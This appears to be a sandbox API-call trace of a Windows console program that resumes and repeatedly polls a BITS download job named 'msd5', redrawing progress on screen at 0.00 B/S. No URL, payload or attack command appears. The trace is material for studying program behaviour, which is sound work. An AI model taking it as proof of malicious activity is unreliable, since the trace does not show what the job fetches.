[0078.200] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af424 | out: ppvObject=0x1af424*=0x320c70) returned 0x0
[0078.200] IUnknown:AddRef (This=0x320c70) returned 0x3
[0078.200] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af384 | out: ppvObject=0x1af384*=0x0) returned 0x80004002
[0078.200] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x320d84 | out: ppvObject=0x320d84*=0x0) returned 0x80004002
[0078.200] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x1af38c | out: ppvObject=0x1af38c*=0x0) returned 0x80004002
[0078.200] IUnknown:Release (This=0x320c70) returned 0x2
[0078.203] IUnknown:QueryInterface (in: This=0x320c70, riid=0x311b98*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x1ae88c | out: ppvObject=0x1ae88c*=0x0) returned 0x80004002
[0078.203] IUnknown:QueryInterface (in: This=0x320c70, riid=0x311b98*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x1ae88c | out: ppvObject=0x1ae88c*=0x320c70) returned 0x0
[0078.203] IUnknown:QueryInterface (in: This=0x320c70, riid=0x311b98*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x3182f8 | out: ppvObject=0x3182f8*=0x320c70) returned 0x0
[0078.205] IBackgroundCopyJob:Resume (This=0x30a61c) returned 0x0
[0078.208] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0078.208] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0078.208] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1af9a8 | out: lpMode=0x1af9a8) returned 1
[0078.217] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0078.217] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1af9e8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0078.217] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 1
[0078.217] TranslateMessage (lpMsg=0x1af9c0) returned 0
[0078.217] DispatchMessageW (lpMsg=0x1af9c0) returned 0x1
[0078.218] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x1af51c | out: ppvObject=0x1af51c*=0x0) returned 0x80004002
[0078.218] IBackgroundCopyCallback:JobModification (This=0x320c70, pJob=0x30a6ac, dwReserved=0x0) returned 0x0
[0078.218] IBackgroundCopyJob:GetState (in: This=0x30a61c, pVal=0x320c7c | out: pVal=0x320c7c) returned 0x0
[0078.218] IBackgroundCopyCallback:JobModification (This=0x320c70, pJob=0x30a6ac, dwReserved=0x0) returned 0x0
[0078.218] IBackgroundCopyJob:GetState (in: This=0x30a61c, pVal=0x320c7c | out: pVal=0x320c7c) returned 0x0
[0078.220] IBackgroundCopyJob:GetType (in: This=0x30a61c, pVal=0x1ae080 | out: pVal=0x1ae080) returned 0x0
[0078.221] IBackgroundCopyJob:GetProgress (in: This=0x30a61c, pVal=0x320c80 | out: pVal=0x320c80) returned 0x0
[0078.222] IBackgroundCopyJob:GetPriority (in: This=0x30a61c, pVal=0x1ae07c | out: pVal=0x1ae07c) returned 0x0
[0078.223] CoTaskMemFree (pv=0x0)
[0078.223] IBackgroundCopyJob:GetDisplayName (in: This=0x30a61c, pVal=0x1ae094 | out: pVal=0x1ae094*="msd5") returned 0x0
[0078.223] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae03c | out: lpConsoleScreenBufferInfo=0x1ae03c) returned 1
[0078.224] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1ae054 | out: lpNumberOfCharsWritten=0x1ae054) returned 1
[0078.224] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1ae054 | out: lpNumberOfAttrsWritten=0x1ae054) returned 1
[0078.224] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0078.225] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.225] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae028 | out: lpConsoleScreenBufferInfo=0x1ae028) returned 1
[0078.225] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ae040, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae040*=0xa) returned 1
[0078.225] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.226] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae024 | out: lpConsoleScreenBufferInfo=0x1ae024) returned 1
[0078.226] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ae03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae03c*=0x5) returned 1
[0078.226] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.226] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae02c | out: lpConsoleScreenBufferInfo=0x1ae02c) returned 1
[0078.226] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ae044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae044*=0x7) returned 1
[0078.227] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.227] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae020 | out: lpConsoleScreenBufferInfo=0x1ae020) returned 1
[0078.227] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ae038, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae038*=0x8) returned 1
[0078.227] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.228] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae028 | out: lpConsoleScreenBufferInfo=0x1ae028) returned 1
[0078.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ae040, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae040*=0x8) returned 1
[0078.228] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.228] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae01c | out: lpConsoleScreenBufferInfo=0x1ae01c) returned 1
[0078.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1ae034, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae034*=0xc) returned 1
[0078.229] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.229] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae02c | out: lpConsoleScreenBufferInfo=0x1ae02c) returned 1
[0078.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ae044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae044*=0xa) returned 1
[0078.229] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae014 | out: lpConsoleScreenBufferInfo=0x1ae014) returned 1
[0078.230] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ae02c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae02c*=0xa) returned 1
[0078.230] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae01c | out: lpConsoleScreenBufferInfo=0x1ae01c) returned 1
[0078.231] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ae034, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae034*=0x8) returned 1
[0078.231] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.231] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ae040 | out: _Buffer="0") returned 1
[0078.231] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ae04c | out: _Buffer="1") returned 1
[0078.231] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae01c | out: lpConsoleScreenBufferInfo=0x1ae01c) returned 1
[0078.231] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ae034, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae034*=0x5) returned 1
[0078.232] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.232] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae024 | out: lpConsoleScreenBufferInfo=0x1ae024) returned 1
[0078.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ae03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae03c*=0x8) returned 1
[0078.232] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.232] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ae048 | out: _Buffer="0") returned 1
[0078.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ae03c | out: lpSystemTimeAsFileTime=0x1ae03c*(dwLowDateTime=0xdf36cd10, dwHighDateTime=0x1d469c7))
[0078.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ae034 | out: lpSystemTimeAsFileTime=0x1ae034*(dwLowDateTime=0xdf36cd10, dwHighDateTime=0x1d469c7))
[0078.233] _finite (_X=0x0) returned 0
[0078.233] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adff4 | out: lpConsoleScreenBufferInfo=0x1adff4) returned 1
[0078.233] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1ae00c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae00c*=0xd) returned 1
[0078.233] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.233] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae000 | out: lpConsoleScreenBufferInfo=0x1ae000) returned 1
[0078.234] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1ae018, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae018*=0xf) returned 1
[0078.234] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.234] _vsnwprintf (in: _Buffer=0x1ade2c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1addf0 | out: _Buffer="0.00 B/S") returned 8
[0078.234] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae044 | out: lpConsoleScreenBufferInfo=0x1ae044) returned 1
[0078.234] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ae05c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1ae05c*=0x8) returned 1
[0078.235] CoTaskMemFree (pv=0x318390)
[0078.235] IBackgroundCopyJob:GetType (in: This=0x30a61c, pVal=0x1af088 | out: pVal=0x1af088) returned 0x0
[0078.236] IBackgroundCopyJob:GetProgress (in: This=0x30a61c, pVal=0x320c80 | out: pVal=0x320c80) returned 0x0
[0078.236] IBackgroundCopyJob:GetPriority (in: This=0x30a61c, pVal=0x1af084 | out: pVal=0x1af084) returned 0x0
[0078.237] CoTaskMemFree (pv=0x0)
[0078.237] IBackgroundCopyJob:GetDisplayName (in: This=0x30a61c, pVal=0x1af09c | out: pVal=0x1af09c*="msd5") returned 0x0
[0078.238] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af044 | out: lpConsoleScreenBufferInfo=0x1af044) returned 1
[0078.238] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1af05c | out: lpNumberOfCharsWritten=0x1af05c) returned 1
[0078.238] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1af05c | out: lpNumberOfAttrsWritten=0x1af05c) returned 1
[0078.239] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0078.239] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.239] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af030 | out: lpConsoleScreenBufferInfo=0x1af030) returned 1
[0078.239] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af048, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af048*=0xa) returned 1
[0078.240] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.240] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af02c | out: lpConsoleScreenBufferInfo=0x1af02c) returned 1
[0078.240] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1af044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af044*=0x5) returned 1
[0078.240] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.240] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af034 | out: lpConsoleScreenBufferInfo=0x1af034) returned 1
[0078.241] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1af04c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af04c*=0x7) returned 1
[0078.241] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.241] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af028 | out: lpConsoleScreenBufferInfo=0x1af028) returned 1
[0078.241] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af040, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af040*=0x8) returned 1
[0078.242] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.242] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af030 | out: lpConsoleScreenBufferInfo=0x1af030) returned 1
[0078.242] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af048, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af048*=0x8) returned 1
[0078.242] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.243] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0xc) returned 1
[0078.243] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af034 | out: lpConsoleScreenBufferInfo=0x1af034) returned 1
[0078.243] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af04c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af04c*=0xa) returned 1
[0078.244] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.244] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af01c | out: lpConsoleScreenBufferInfo=0x1af01c) returned 1
[0078.244] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af034, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af034*=0xa) returned 1
[0078.244] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.245] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0x8) returned 1
[0078.245] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.245] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af048 | out: _Buffer="0") returned 1
[0078.245] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af054 | out: _Buffer="1") returned 1
[0078.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.246] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0x5) returned 1
[0078.246] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.246] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af02c | out: lpConsoleScreenBufferInfo=0x1af02c) returned 1
[0078.246] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af044*=0x8) returned 1
[0078.246] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.247] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af050 | out: _Buffer="0") returned 1
[0078.247] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af03c | out: lpSystemTimeAsFileTime=0x1af03c*(dwLowDateTime=0xdf392e70, dwHighDateTime=0x1d469c7))
[0078.247] _finite (_X=0x0) returned 1
[0078.247] _finite (_X=0x0) returned 1
[0078.247] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aeffc | out: lpConsoleScreenBufferInfo=0x1aeffc) returned 1
[0078.247] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1af014, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af014*=0xd) returned 1
[0078.247] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.247] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af008 | out: lpConsoleScreenBufferInfo=0x1af008) returned 1
[0078.248] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1af020, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af020*=0xf) returned 1
[0078.248] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.248] _vsnwprintf (in: _Buffer=0x1aee34, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1aedf8 | out: _Buffer="0.00 B/S") returned 8
[0078.248] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af04c | out: lpConsoleScreenBufferInfo=0x1af04c) returned 1
[0078.248] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af064, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af064*=0x8) returned 1
[0078.248] CoTaskMemFree (pv=0x318390)
[0078.249] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 0
[0078.249] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1af9e8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0078.428] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 1
[0078.428] TranslateMessage (lpMsg=0x1af9c0) returned 0
[0078.428] DispatchMessageW (lpMsg=0x1af9c0) returned 0x1
[0078.429] IBackgroundCopyCallback:JobModification (This=0x320c70, pJob=0x30a6ac, dwReserved=0x0) returned 0x0
[0078.429] IBackgroundCopyJob:GetState (in: This=0x30a61c, pVal=0x320c7c | out: pVal=0x320c7c) returned 0x0
[0078.435] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fba
[0078.435] IBackgroundCopyJob:GetType (in: This=0x30a61c, pVal=0x1af088 | out: pVal=0x1af088) returned 0x0
[0078.436] IBackgroundCopyCallback:JobModification (This=0x320c70, pJob=0x30a6ac, dwReserved=0x0) returned 0x0
[0078.436] IBackgroundCopyJob:GetState (in: This=0x30a61c, pVal=0x320c7c | out: pVal=0x320c7c) returned 0x0
[0078.437] IBackgroundCopyJob:GetProgress (in: This=0x30a61c, pVal=0x320c80 | out: pVal=0x320c80) returned 0x0
[0078.438] IBackgroundCopyJob:GetPriority (in: This=0x30a61c, pVal=0x1af084 | out: pVal=0x1af084) returned 0x0
[0078.439] CoTaskMemFree (pv=0x0)
[0078.439] IBackgroundCopyJob:GetDisplayName (in: This=0x30a61c, pVal=0x1af09c | out: pVal=0x1af09c*="msd5") returned 0x0
[0078.440] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af044 | out: lpConsoleScreenBufferInfo=0x1af044) returned 1
[0078.440] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1af05c | out: lpNumberOfCharsWritten=0x1af05c) returned 1
[0078.440] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1af05c | out: lpNumberOfAttrsWritten=0x1af05c) returned 1
[0078.441] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0078.441] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af030 | out: lpConsoleScreenBufferInfo=0x1af030) returned 1
[0078.441] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af048, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af048*=0xa) returned 1
[0078.441] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.442] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af02c | out: lpConsoleScreenBufferInfo=0x1af02c) returned 1
[0078.442] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1af044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af044*=0x5) returned 1
[0078.442] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.442] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af034 | out: lpConsoleScreenBufferInfo=0x1af034) returned 1
[0078.443] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1af04c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af04c*=0x7) returned 1
[0078.443] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.443] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af028 | out: lpConsoleScreenBufferInfo=0x1af028) returned 1
